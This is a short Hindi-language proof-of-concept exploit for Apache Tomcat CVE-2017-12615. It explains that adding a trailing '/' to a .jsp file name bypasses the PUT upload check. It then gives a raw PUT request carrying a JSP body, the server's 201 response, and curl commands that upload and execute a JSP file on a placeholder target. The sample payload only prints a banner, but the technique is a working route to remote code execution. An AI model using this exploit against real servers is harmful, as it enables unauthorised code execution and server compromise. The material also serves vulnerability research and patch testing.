
POC Exploit for Apache Tomcat 7.0.x CVE-2017-12615 PUT JSP कमजोरी
Apache Tomcat 7.0.0 से 7.0.79 तक Windows पर चलने वाले POC शोषण; CVE-2017-12615 PUT JSP भेद्यता।
डिज़ाइन के अनुसार, Apache Tomcat सर्वर पर PUT विधि के माध्यम से JSP फ़ाइलें अपलोड करने की अनुमति नहीं है। यह संभवतः एक सुरक्षा उपाय है ताकि हमलावर JSP शेल अपलोड करके सर्वर पर रिमोट कोड निष्पादन प्राप्त न कर सके। हालांकि, अपर्याप्त जांच के कारण, हमलावर 7.0.{0 से 79} Tomcat सर्वरों पर रिमोट कोड निष्पादन प्राप्त कर सकता है जिन्होंने PUT को सक्षम किया है, बशर्ते वह Tomcat सर्वर पर एक विशेष रूप से तैयार HTTP अनुरोध का उपयोग करके PUT विधि का अनुरोध करे। लेकिन सच में, विशेष? कृपया।
फ़ाइल नाम के एक्सटेंशन के पीछे '/' वर्ण जोड़कर, फ़ाइल एक्सटेंशन जांच को बायपास किया जा सकता है। बस इतना ही। तो, वास्तव में वह विशेष नहीं है।
PUT /myfile.jsp/
Host: domain-name:port
Connection: close
Content-Length: 85
<% out.write("<html><body><h3>[+] JSP upload successfully.</h3></body></html>"); %>
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
Content-Length: 0
Date: Sat, 23 Sep 2017 06:36:36 GMT
Connection: close
<% out.write("<html><body><h3>[+] JSP file successfully uploaded via curl and JSP out.write executed.</h3></body></html>"); %>
curl -X PUT http://target-host-or-ip-address:port/test.jsp/ -d @- < test.jsp
curl http://target-host-or-ip-address:port/test.jsp